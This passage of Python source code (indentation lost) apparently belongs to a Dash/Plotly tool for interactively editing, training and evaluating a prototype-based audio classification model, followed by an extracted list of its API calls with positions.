clickmode= 'event+select',uirevision=True
)
return self.figure_training
def generate_figure_weights(self,selected=None):
fig_weigths = go.Figure(px.imshow(self.model_containers[self.fold_test].prototypes.W_dense.T,origin='lower'),layout=go.Layout(title=go.layout.Title(text="A Bar Chart")))
fig_weigths.update_layout(clickmode='event+select')
if selected is not None:
fig_weigths.add_trace(go.Scatter(x=[selected],y=[1]))
_,_,_,prototypes_classes,_ = self.model_containers[self.fold_test].prototypes.get_all_instances()
xticks = []
for j in range(10):
tickj = np.mean(np.argwhere(np.array(prototypes_classes) == j))
xticks.append(tickj)
self.fig_weigths = fig_weigths
self.fig_weigths.update_layout(
title="Weights of the last fully-connected layer",
xaxis_title="Prototypes",
yaxis_title="Classes",
#margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
xaxis = dict(
tickmode = 'array',
tickvals = xticks,
ticktext = class_names2
),
yaxis = dict(
tickmode = 'array',
tickvals = [i for i in range(len(class_names))],
ticktext = class_names
)
)
return fig_weigths
def generate_figure_mel(self,mel_spec):
figure = go.Figure(px.imshow(mel_spec.T,origin='lower'),layout=go.Layout(title=go.layout.Title(text="A Bar Chart")))
figure.update_layout(
title="Mel-spectrogram",
xaxis_title="Time (hops)",
yaxis_title="Mel filter index",
#margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
)
#figure.layout.coloraxis.showscale = False
return figure
def add_mel_to_figure(self,hoverData):
point = np.array([hoverData['points'][0]['x'],hoverData['points'][0]['y']])
dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
#print(np.amin(dist_data),np.amin(dist_protos))
if np.amin(dist_data) <= np.amin(dist_protos): # click on k-mean
arg_dist = np.argmin(dist_data)
# print(arg_dist)
(center_mel,center_feat,center_2D,
center_class,center_file,center_audio)=self.model_containers[self.fold_test].data_instances.get_center(arg_dist)
from PIL import Image
image_array = np.random.randint(0, 255, size=(100, 100)).astype('uint8')
center_mel = cm(center_mel.T)
#center_mel = 255*(center_mel-np.amin(center_mel))/(np.amax(center_mel)-np.amin(center_mel))
image = Image.fromarray((center_mel[:, :, :3] * 255).astype('uint8'))
layout= go.Layout(images= [dict(
source= image,
xref= "x",
yref= "y",
x= hoverData['points'][0]['x']-0.5,
y= hoverData['points'][0]['y']+2,
sizex= 2,
sizey= 2,
#sizing= "stretch",
opacity= 1.0#,layer= "below"
)])
self.figure.update_layout(layout)
else:
arg_dist = np.argmin(dist_protos)
(proto_feat,proto_mel,
proto_2D,proto_class,proto_audio) = self.model_containers[self.fold_test].prototypes.get_prototype_by_index(arg_dist)
def display_plot(self,clickData):
temp_mel = np.ones((64,128))
if isinstance(clickData,dict):
point = np.array([clickData['points'][0]['x'],clickData['points'][0]['y']])
print(self.fold_test)
dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
if np.amin(dist_data) <= np.amin(dist_protos): # click on k-mean
arg_dist = np.argmin(dist_data)
(center_feat,center_mel,center_2D,
center_class,center_audio,center_file)=self.model_containers[self.fold_test].data_instances.get_instance_by_index(arg_dist)
self.selected = {'type': 'center', 'id': arg_dist}
figure = self.generate_figure_mel(center_mel)
data, sr = librosa.core.load(center_file)
return [figure,
{'autoPlay': True, 'src': encode_audio(data,sr)}, #encode_audio(center_audio['data'],center_audio['sr'])
"Convert center to Prototype", {'display':'inline-block','width':'70%'}]
else:
arg_dist = np.argmin(dist_protos)
(proto_feat,proto_mel,
proto_2D,proto_class,proto_audio) = self.model_containers[self.fold_test].prototypes.get_instance_by_index(arg_dist)
self.selected = {'type': 'prototype', 'id': arg_dist}
figure = self.generate_figure_mel(proto_mel)
return [figure,
{'autoPlay': True, 'src': encode_audio(proto_audio['data'],proto_audio['sr'])},
"Delete Prototype", {'display':'inline-block','width':'70%'}]
else:
return [self.generate_figure_mel(temp_mel), {'autoPlay': False, 'src': ''},
"Select a point", {'display':'none','width':'70%'}]
def buttons_and_others(self,btn1,btn2,btn3,fold_selected,clickData,samples_per_class,x_select,y_select,epochs,learning_rate,batch_size,selectedData,selectedData_w):
if x_select != self.x_select:
self.x_select = x_select
self.generate_figure2D()
return [self.figure, self.fig_weigths]
if y_select != self.y_select:
self.y_select = y_select
self.generate_figure2D()
return [self.figure, self.fig_weigths]
if samples_per_class != self.samples_per_class:
#print(samples_per_class,self.samples_per_class)
self.samples_per_class = samples_per_class
self.generate_figure2D()
#print('new figure')
return [self.figure, self.fig_weigths]
# if model_select != self.model_input_name:
# print(model_select,self.model_input_name)
# self.model_input_name = model_select
# scaler_path = os.path.join(scaler_folder, 'base')
# self.load_model_prototypes_centers(folds_data_test,folds_files,scaler_path)
# return [self.figure, self.fig_weigths]
#print(clickData,selectedData_w)
#self.generate_figure2D(selectedpoints=clickData)
#print(fold_selected,self.fold_test)
if fold_selected != self.fold_test:
self.change_fold(fold_selected)
return [self.figure, self.fig_weigths]
#print(clickData)
if clickData is not None:
selected_prototype = clickData['points'][0]['x']
#print(selected_prototype,self.selected_prototype)
if selected_prototype != self.selected_prototype:
self.selected_prototype = selected_prototype
self.generate_figure2D([selected_prototype])
#print(clickData)
return [self.figure, self.fig_weigths]
#print(btn1,btn2,btn3,self.click_timestamps[0],self.click_timestamps[1],self.click_timestamps[2])
if int(btn1) > self.click_timestamps[0]:
self.click_timestamps[0] = int(btn1)
self.click_delete(selectedData)
if int(btn2) > self.click_timestamps[1]:
self.click_timestamps[1] = int(btn2)
self.click_reset()
if int(btn3) > self.click_timestamps[2]:
self.click_timestamps[2] = int(btn3)
msg = 'Button 3 was most recently clicked'
if epochs is not None:
self.params['train']['epochs'] = int(epochs)
if learning_rate is not None:
self.params['train']['learning_rate'] = learning_rate
if batch_size is not None:
self.params['train']['batch_size'] = int(batch_size)
print(epochs,learning_rate,batch_size)
self.train_model()
#self.model_output_name = model_output_name
#scaler_path = os.path.join(scaler_folder, 'base')
#weights_folder_debug_manual = os.path.join(weights_folder, 'debug_manual2')
#last_training_log = self.get_training_log()[-1]
#initial_epoch = int(last_training_log['epochs'][-1])+1
#self.train_model(folds_data=folds_data,folds_data_test=folds_data_test,folds_files=folds_files,scaler_path=scaler_path,
# epochs=epochs,learning_rate=learning_rate,batch_size=batch_size,fit_verbose=1,convert_audio_dict=convert_audio_dict,graph=graph,initial_epoch=initial_epoch)
return [self.figure, self.fig_weigths]
def btn_load(self,n_clicks_timestamp,n_clicks_timestamp2):
if n_clicks_timestamp > n_clicks_timestamp2:
#self.load_weights(weights_folder_debug_manual)
return "TODO"#"Weights loaded from " + weights_folder_debug_manual
elif n_clicks_timestamp2 > n_clicks_timestamp:
acc = self.eval_model()
return "Accuracy in fold {:s}: {:f}".format(self.fold_val, acc)
else:
return ""
def click_delete(self,selectedData):
#msg = 'Button 1 was most recently clicked'
point = np.array([selectedData['points'][0]['x'],selectedData['points'][0]['y']])
dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
#print(np.amin(dist_data),np.amin(dist_protos))
if np.amin(dist_data) <= np.amin(dist_protos): # click on k-mean
arg_dist = np.argmin(dist_data)
(center_feat,center_mel,center_2D,
center_class,_,center_file) = self.model_containers[self.fold_test].data_instances.remove_instance(arg_dist)
data, sr = librosa.core.load(center_file)
center_audio = {'data':data, 'sr': sr}
self.model_containers[self.fold_test].prototypes.add_instance(int(center_class),
center_mel,center_feat,
embedding2D=center_2D,audio=center_audio)
else:
arg_dist = np.argmin(dist_protos)
self.model_containers[self.fold_test].prototypes.remove_instance(arg_dist)
self.generate_figure2D()
self.generate_figure_weights()
return self.figure
def click_reset(self):
self.model_containers[self.fold_test].data_instances.reset()
self.model_containers[self.fold_test].prototypes.reset()
self.generate_figure2D()
self.generate_figure_weights()
return self.figure
def change_fold(self,fold_selected):
print('fold_selected', fold_selected)
self.fold_test = fold_selected
self.fold_val = get_fold_val(self.fold_test, self.fold_list)
print(self.fold_val)
self.generate_figure2D()
#self.generate_figure_training()
self.generate_figure_weights()
return self.figure
def eval_model(self):
with self.graph.as_default():
self.update_model_to_prototypes()
scaler_path = os.path.join(self.exp_folder_input, self.fold_test, 'scaler.pickle')
scaler = load_pickle(scaler_path)
acc,_,_ = self.model_containers[self.fold_test].evaluate(self.data[self.fold_val]['X'],self.data[self.fold_val]['Y'], scaler)
return acc
def update_model_to_prototypes(self):
N_protos = self.model_containers[self.fold_test].prototypes.get_number_of_instances()
n_classes = len(self.label_list)
#self.model_containers[self.fold_test].model = debugg_model(self.model_containers[self.fold_test].model,N_protos,n_classes)
#self.model_containers[self.fold_test].model.get_layer('prototype_distances').set_weights([self.model_containers[self.fold_test].prototypes.embeddings])
#self.model_containers[self.fold_test].model.get_layer('mean').set_weights([self.model_containers[self.fold_test].prototypes.W_mean])
#self.model_containers[self.fold_test].model.get_layer('logits').set_weights([self.model_containers[self.fold_test].prototypes.W_dense])
n_frames_cnn,n_freq_cnn = self.model_containers[self.fold_test].prototypes.mel_spectrograms[0].shape
N_filters_last = self.model_containers[self.fold_test].model.get_layer('features').output_shape[-1]
model = modelAPNet(n_prototypes=N_protos, n_frames_cnn=n_frames_cnn, n_freq_cnn=n_freq_cnn, N_filters=[16,16,N_filters_last])
for layer in model.layers:
if len(layer.get_weights()) > 0:
if layer.name == 'prototype_distances':
model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.embeddings])
elif layer.name == 'mean':
model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.W_mean])
elif layer.name == 'logits':
model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.W_dense])
elif layer.name == 'input':
continue
else:
model.get_layer(layer.name).set_weights(self.model_containers[self.fold_test].model.get_layer(layer.name).get_weights())
self.model_containers[self.fold_test].model = model
def train_model(self):
with self.graph.as_default():
self.update_model_to_prototypes()
# paths
dataset = self.exp_folder_output.split("/")[-1] #TODO fix this
exp_folder_fold = os.path.join(self.exp_folder_output, self.fold_test)
weights_path = exp_folder_fold#os.path.join(exp_folder_fold, 'best_weights.hdf5')
log_path = os.path.join(exp_folder_fold, 'training.log')
scaler_path = os.path.join(self.exp_folder_input, self.fold_test, 'scaler.pickle')
params_model = self.params["models"]['APNet']
params_dataset = self.params["datasets"][dataset]
kwargs = self.params["train"]
if 'train_arguments' in params_model:
kwargs.update(params_model['train_arguments'])
kwargs.update({'init_last_layer': False})
# save model as json
self.model_containers[self.fold_test].save_model_json(exp_folder_fold)
X_train, Y_train, X_val, Y_val = get_data_train(self.data, self.fold_test, params_dataset["evaluation_mode"])
# HERE HAS TO BE DATA FOR TRAINING
#print(X_train.shape,Y_train.shape,X_val.shape,Y_val.shape)
scaler = load_pickle(scaler_path)
X_train = scaler.transform(X_train)
X_val = scaler.transform(X_val)
self.model_containers[self.fold_test].train(X_train, Y_train, X_val, Y_val,
weights_path=weights_path, log_path=log_path, **kwargs)
# load best_weights after training
self.model_containers[self.fold_test].model.load_weights(os.path.join(exp_folder_fold, 'best_weights.hdf5'))
# val_out_acc = history.history['val_out_acc']
# epochs = [i for i in range(initial_epoch,epochs+initial_epoch)]
# self.training_logs[self.fold_test][-1]['epochs'] = epochs
# self.training_logs[self.fold_test][-1]['val_acc'] = val_out_acc
# self.training_logs[self.fold_test][-1]['training'] = False
# #print(self.training_logs[self.fold_test][-1])
# #print(history.history)
print('Reloading the plot')
data_instances_path = os.path.join(exp_folder_fold, 'data_instances.pickle')
prototypes_path = os.path.join(exp_folder_fold, 'prototypes.pickle')
X_feat,X_train,Y_train,Files_names_train = get_data_test(self.model_containers[self.fold_test].model,self.data,self.fold_test,self.folds_files,scaler)
# TODO: data_centers[fold_test] = Data_centers(X_feat,X_train,Y_train,Files_names_train,n_classes=10,n_clusters=5)
mel_basis = np.load(os.path.join(params_dataset['feature_folder'], 'mel_basis.npy'))
convert_audio_params = {'sr': self.params['features']['sr'],
'scaler' : scaler,
'mel_basis' : mel_basis,
'audio_hop' : self.params['features']['audio_hop'],
'audio_win' : self.params['features']['audio_win']}
projection2D = self.model_containers[self.fold_test].data_instances.projection2D
self.model_containers[self.fold_test].get_prototypes(X_train,
convert_audio_params=convert_audio_params,
projection2D=projection2D)
data_instances_path = os.path.join(self.exp_folder_output, 'data_instances.pickle')
prototypes_path = os.path.join(self.exp_folder_output, 'prototypes.pickle')
save_pickle(self.model_containers[self.fold_test].data_instances, data_instances_path)
save_pickle(self.model_containers[self.fold_test].prototypes, prototypes_path)
self.generate_figure2D()
self.generate_figure_weights()
return self.figure
def load_weights(self, weights_folder=''):
weights_file = 'fold' + str(self.fold_test) + '.hdf5' #_{epoch:02d}
weights_path = os.path.join(weights_folder, weights_file)
self.model_containers[self.fold_test].model.load_weights(weights_path)
#scaler = load_scaler(scaler_path,self.fold_test)
def get_training_log(self):
return self.training_logs[self.fold_test]
def append_training_log(self,training_log_new):
self.training_logs[self.fold_test].append(training_log_new)
| [
"dash_html_components.Button",
"dcase_models.util.files.save_pickle",
"numpy.array",
"plotly.graph_objects.layout.Title",
"dash_audio_components.DashAudioComponents",
"dash_html_components.Div",
"librosa.core.load",
"dash_html_components.Br",
"plotly.graph_objects.Scatter",
"numpy.argmin",
"plot... | [((1746, 1769), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""viridis"""'], {}), "('viridis')\n", (1758, 1769), True, 'import matplotlib.pyplot as plt\n'), ((4152, 4181), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(1)'}), '(rows=1, cols=1)\n', (4165, 4181), False, 'from plotly.subplots import make_subplots\n'), ((7168, 7231), 'plotly.express.imshow', 'px.imshow', (['model_container.prototypes.W_dense.T'], {'origin': '"""lower"""'}), "(model_container.prototypes.W_dense.T, origin='lower')\n", (7177, 7231), True, 'import plotly.express as px\n'), ((8536, 8573), 'plotly.express.imshow', 'px.imshow', (['mel_spec.T'], {'origin': '"""lower"""'}), "(mel_spec.T, origin='lower')\n", (8545, 8573), True, 'import plotly.express as px\n'), ((9779, 9823), 'dcase_models.util.data.get_fold_val', 'get_fold_val', (['self.fold_test', 'self.fold_list'], {}), '(self.fold_test, self.fold_list)\n', (9791, 9823), False, 'from dcase_models.util.data import get_fold_val\n'), ((10490, 10512), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (10510, 10512), True, 'import tensorflow as tf\n'), ((10603, 10692), 'dash_core_components.Graph', 'dcc.Graph', ([], {'id': '"""plot2D"""', 'figure': 'self.figure', 'style': "{'height': '100%', 'width': '100%'}"}), "(id='plot2D', figure=self.figure, style={'height': '100%', 'width':\n '100%'})\n", (10612, 10692), True, 'import dash_core_components as dcc\n'), ((11083, 11192), 'dash_core_components.Graph', 'dcc.Graph', ([], {'id': '"""plot_weights"""', 'figure': 'self.fig_weigths', 'style': "{'width': '100%', 'display': 'inline-block'}"}), "(id='plot_weights', figure=self.fig_weigths, style={'width':\n '100%', 'display': 'inline-block'})\n", (11092, 11192), True, 'import dash_core_components as dcc\n'), ((11286, 11389), 'dash_audio_components.DashAudioComponents', 'dash_audio_components.DashAudioComponents', ([], {'id': '"""audio-player"""', 'src': '""""""', 'autoPlay': '(False)', 'controls': '(True)'}), "(id='audio-player', src='',\n autoPlay=False, controls=True)\n", (11327, 11389), False, 'import dash_audio_components\n'), ((11469, 11614), 'dash_html_components.Button', 'html.Button', (['"""Delete prototype"""'], {'id': '"""delete_and_convert"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'display': 'none', 'width': '70%'}"}), "('Delete prototype', id='delete_and_convert', className='button',\n n_clicks_timestamp=0, style={'display': 'none', 'width': '70%'})\n", (11480, 11614), True, 'import dash_html_components as html\n'), ((11627, 11737), 'dash_html_components.Button', 'html.Button', (['"""Evaluate model"""'], {'id': '"""eval"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Evaluate model', id='eval', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11638, 11737), True, 'import dash_html_components as html\n'), ((11752, 11873), 'dash_html_components.Button', 'html.Button', (['"""Load best weigths"""'], {'id': '"""load_weigths"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Load best weigths', id='load_weigths', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11763, 11873), True, 'import dash_html_components as html\n'), ((11889, 11997), 'dash_html_components.Button', 'html.Button', (['"""Train model"""'], {'id': '"""train"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Train model', id='train', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11900, 11997), True, 'import dash_html_components as html\n'), ((12013, 12121), 'dash_html_components.Button', 'html.Button', (['"""Reset model"""'], {'id': '"""reset"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Reset model', id='reset', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (12024, 12121), True, 'import dash_html_components as html\n'), ((12136, 12186), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_eval"""', 'style': "{'width': '20%'}"}), "(id='output_eval', style={'width': '20%'})\n", (12144, 12186), True, 'import dash_html_components as html\n'), ((12207, 12233), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_text"""'}), "(id='output_text')\n", (12215, 12233), True, 'import dash_html_components as html\n'), ((12260, 12290), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_interval"""'}), "(id='output_interval')\n", (12268, 12290), True, 'import dash_html_components as html\n'), ((12316, 12433), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""input_epochs"""', 'type': '"""number"""', 'placeholder': '"""epochs"""', 'min': '(1)', 'max': '(100)', 'step': '(1)', 'style': "{'width': '33%'}"}), "(id='input_epochs', type='number', placeholder='epochs', min=1,\n max=100, step=1, style={'width': '33%'})\n", (12325, 12433), True, 'import dash_core_components as dcc\n'), ((12458, 12577), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""learning_rate"""', 'type': '"""number"""', 'placeholder': '"""learning_rate"""', 'min': '(1e-07)', 'max': '(1)', 'style': "{'width': '33%'}"}), "(id='learning_rate', type='number', placeholder='learning_rate',\n min=1e-07, max=1, style={'width': '33%'})\n", (12467, 12577), True, 'import dash_core_components as dcc\n'), ((12595, 12716), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""batch_size"""', 'type': '"""number"""', 'placeholder': '"""batch_size"""', 'min': '(32)', 'max': '(512)', 'step': '(32)', 'style': "{'width': '33%'}"}), "(id='batch_size', type='number', placeholder='batch_size', min=32,\n max=512, step=32, style={'width': '33%'})\n", (12604, 12716), True, 'import dash_core_components as dcc\n'), ((12881, 12952), 'dash_core_components.Interval', 'dcc.Interval', ([], {'id': '"""interval-component"""', 'interval': '(1 * 1000)', 'n_intervals': '(0)'}), "(id='interval-component', interval=1 * 1000, n_intervals=0)\n", (12893, 12952), True, 'import dash_core_components as dcc\n'), ((13169, 13267), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""fold_select"""', 'options': 'options', 'value': 'self.fold_test', 'style': "{'width': '85%'}"}), "(id='fold_select', options=options, value=self.fold_test, style\n ={'width': '85%'})\n", (13181, 13267), True, 'import dash_core_components as dcc\n'), ((13687, 13764), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""x_select"""', 'options': 'options', 'value': '(0)', 'style': "{'width': '80%'}"}), "(id='x_select', options=options, value=0, style={'width': '80%'})\n", (13699, 13764), True, 'import dash_core_components as dcc\n'), ((13781, 13858), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""y_select"""', 'options': 'options', 'value': '(1)', 'style': "{'width': '80%'}"}), "(id='y_select', options=options, value=1, style={'width': '80%'})\n", (13793, 13858), True, 'import dash_core_components as dcc\n'), ((13876, 13954), 'dash_html_components.Div', 'html.Div', (['[button_eval, output_eval]'], {'style': "{'columnCount': 2, 'width': '50%'}"}), "([button_eval, output_eval], style={'columnCount': 2, 'width': '50%'})\n", (13884, 13954), True, 'import dash_html_components as html\n'), ((13971, 14039), 'dash_html_components.Div', 'html.Div', (['[input_epochs, input_lr, input_bs]'], {'style': "{'width': '70%'}"}), "([input_epochs, input_lr, input_bs], style={'width': '70%'})\n", (13979, 14039), True, 'import dash_html_components as html\n'), ((14097, 14162), 'dash_html_components.Div', 'html.Div', (['[fold_select]'], {'style': "{'columnCount': 3, 'width': '80%'}"}), "([fold_select], style={'columnCount': 3, 'width': '80%'})\n", (14105, 14162), True, 'import dash_html_components as html\n'), ((14185, 14264), 'dash_html_components.Div', 'html.Div', (['[button_load, button_reset]'], {'style': "{'columnCount': 2, 'width': '50%'}"}), "([button_load, button_reset], style={'columnCount': 2, 'width': '50%'})\n", (14193, 14264), True, 'import dash_html_components as html\n'), ((18476, 18505), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(1)'}), '(rows=1, cols=1)\n', (18489, 18505), False, 'from plotly.subplots import make_subplots\n'), ((20535, 20592), 'os.path.join', 'os.path.join', (['self.weights_folder', 'self.model_output_name'], {}), '(self.weights_folder, self.model_output_name)\n', (20547, 20592), False, 'import os\n'), ((24016, 24084), 'numpy.array', 'np.array', (["[hoverData['points'][0]['x'], hoverData['points'][0]['y']]"], {}), "([hoverData['points'][0]['x'], hoverData['points'][0]['y']])\n", (24024, 24084), True, 'import numpy as np\n'), ((25940, 25958), 'numpy.ones', 'np.ones', (['(64, 128)'], {}), '((64, 128))\n', (25947, 25958), True, 'import numpy as np\n'), ((32128, 32202), 'numpy.array', 'np.array', (["[selectedData['points'][0]['x'], selectedData['points'][0]['y']]"], {}), "([selectedData['points'][0]['x'], selectedData['points'][0]['y']])\n", (32136, 32202), True, 'import numpy as np\n'), ((33851, 33895), 'dcase_models.util.data.get_fold_val', 'get_fold_val', (['self.fold_test', 'self.fold_list'], {}), '(self.fold_test, self.fold_list)\n', (33863, 33895), False, 'from dcase_models.util.data import get_fold_val\n'), ((40732, 40774), 'os.path.join', 'os.path.join', (['weights_folder', 'weights_file'], {}), '(weights_folder, weights_file)\n', (40744, 40774), False, 'import os\n'), ((4802, 4990), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'proto_list[j]', 'mode': '"""markers"""', 'selectedpoints': 'selectedpoints_j', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j % 10]}"}), "(x=x[j], y=y[j], text=classes[j], name=proto_list[j], mode=\n 'markers', selectedpoints=selectedpoints_j, marker={'size': size,\n 'symbol': 'cross', 'color': colors[j % 10]})\n", (4812, 4990), True, 'import plotly.graph_objects as go\n'), ((5097, 5304), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'label_list[j]', 'selectedpoints': 'None', 'mode': '"""markers"""', 'marker': "{'size': 5, 'color': colors[j % 10], 'opacity': 0.6}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=label_list[j], selectedpoints=None, mode='markers', marker={\n 'size': 5, 'color': colors[j % 10], 'opacity': 0.6})\n", (5107, 5304), True, 'import plotly.graph_objects as go\n'), ((7610, 7641), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': '[selected]', 'y': '[1]'}), '(x=[selected], y=[1])\n', (7620, 7641), True, 'import plotly.graph_objects as go\n'), ((12756, 12844), 'dash_core_components.Slider', 'dcc.Slider', ([], {'id': '"""samples_per_class"""', 'min': '(1)', 'max': '(500)', 'step': '(1)', 'value': '(10)', 'vertical': '(False)'}), "(id='samples_per_class', min=1, max=500, step=1, value=10,\n vertical=False)\n", (12766, 12844), True, 'import dash_core_components as dcc\n'), ((21550, 21570), 'plotly.graph_objects.Figure', 'go.Figure', ([], {'data': 'data'}), '(data=data)\n', (21559, 21570), True, 'import plotly.graph_objects as go\n'), ((21869, 21905), 'plotly.graph_objects.Figure', 'go.Figure', ([], {'data': "{'x': [0], 'y': [0]}"}), "(data={'x': [0], 'y': [0]})\n", (21878, 21905), True, 'import plotly.graph_objects as go\n'), ((22283, 22372), 'plotly.express.imshow', 'px.imshow', (['self.model_containers[self.fold_test].prototypes.W_dense.T'], {'origin': '"""lower"""'}), "(self.model_containers[self.fold_test].prototypes.W_dense.T,\n origin='lower')\n", (22292, 22372), True, 'import plotly.express as px\n'), ((23568, 23605), 'plotly.express.imshow', 'px.imshow', (['mel_spec.T'], {'origin': '"""lower"""'}), "(mel_spec.T, origin='lower')\n", (23577, 23605), True, 'import plotly.express as px\n'), ((24420, 24438), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (24427, 24438), True, 'import numpy as np\n'), ((24442, 24462), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (24449, 24462), True, 'import numpy as np\n'), ((24505, 24525), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (24514, 24525), True, 'import numpy as np\n'), ((25692, 25714), 'numpy.argmin', 'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (25701, 25714), True, 'import numpy as np\n'), ((26017, 26085), 'numpy.array', 'np.array', (["[clickData['points'][0]['x'], clickData['points'][0]['y']]"], {}), "([clickData['points'][0]['x'], clickData['points'][0]['y']])\n", (26025, 26085), True, 'import numpy as np\n'), ((32537, 32555), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (32544, 32555), True, 'import numpy as np\n'), ((32559, 32579), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (32566, 32579), True, 'import numpy as np\n'), ((32622, 32642), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (32631, 32642), True, 'import numpy as np\n'), ((32839, 32869), 'librosa.core.load', 'librosa.core.load', (['center_file'], {}), '(center_file)\n', (32856, 32869), False, 'import librosa\n'), ((33228, 33250), 'numpy.argmin', 'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (33237, 33250), True, 'import numpy as np\n'), ((34203, 34271), 'os.path.join', 'os.path.join', (['self.exp_folder_input', 'self.fold_test', '"""scaler.pickle"""'], {}), "(self.exp_folder_input, self.fold_test, 'scaler.pickle')\n", (34215, 34271), False, 'import os\n'), ((34293, 34317), 'dcase_models.util.files.load_pickle', 'load_pickle', (['scaler_path'], {}), '(scaler_path)\n', (34304, 34317), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((36739, 36791), 'os.path.join', 'os.path.join', (['self.exp_folder_output', 'self.fold_test'], {}), '(self.exp_folder_output, self.fold_test)\n', (36751, 36791), False, 'import os\n'), ((36911, 36956), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""training.log"""'], {}), "(exp_folder_fold, 'training.log')\n", (36923, 36956), False, 'import os\n'), ((36984, 37052), 'os.path.join', 'os.path.join', (['self.exp_folder_input', 'self.fold_test', '"""scaler.pickle"""'], {}), "(self.exp_folder_input, self.fold_test, 'scaler.pickle')\n", (36996, 37052), False, 'import os\n'), ((37777, 37801), 'dcase_models.util.files.load_pickle', 'load_pickle', (['scaler_path'], {}), '(scaler_path)\n', (37788, 37801), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((38845, 38899), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""data_instances.pickle"""'], {}), "(exp_folder_fold, 'data_instances.pickle')\n", (38857, 38899), False, 'import os\n'), ((38930, 38980), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""prototypes.pickle"""'], {}), "(exp_folder_fold, 'prototypes.pickle')\n", (38942, 38980), False, 'import os\n'), ((40123, 40184), 'os.path.join', 'os.path.join', (['self.exp_folder_output', '"""data_instances.pickle"""'], {}), "(self.exp_folder_output, 'data_instances.pickle')\n", (40135, 40184), False, 'import os\n'), ((40215, 40272), 'os.path.join', 'os.path.join', (['self.exp_folder_output', '"""prototypes.pickle"""'], {}), "(self.exp_folder_output, 'prototypes.pickle')\n", (40227, 40272), False, 'import os\n'), ((40286, 40376), 'dcase_models.util.files.save_pickle', 'save_pickle', (['self.model_containers[self.fold_test].data_instances', 'data_instances_path'], {}), '(self.model_containers[self.fold_test].data_instances,\n data_instances_path)\n', (40297, 40376), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((40385, 40463), 'dcase_models.util.files.save_pickle', 'save_pickle', (['self.model_containers[self.fold_test].prototypes', 'prototypes_path'], {}), '(self.model_containers[self.fold_test].prototypes, prototypes_path)\n', (40396, 40463), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((22556, 22587), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': '[selected]', 'y': '[1]'}), '(x=[selected], y=[1])\n', (22566, 22587), True, 'import plotly.graph_objects as go\n'), ((26410, 26428), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (26417, 26428), True, 'import numpy as np\n'), ((26432, 26452), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (26439, 26452), True, 'import numpy as np\n'), ((26499, 26519), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (26508, 26519), True, 'import numpy as np\n'), ((26905, 26935), 'librosa.core.load', 'librosa.core.load', (['center_file'], {}), '(center_file)\n', (26922, 26935), False, 'import librosa\n'), ((27240, 27262), 'numpy.argmin', 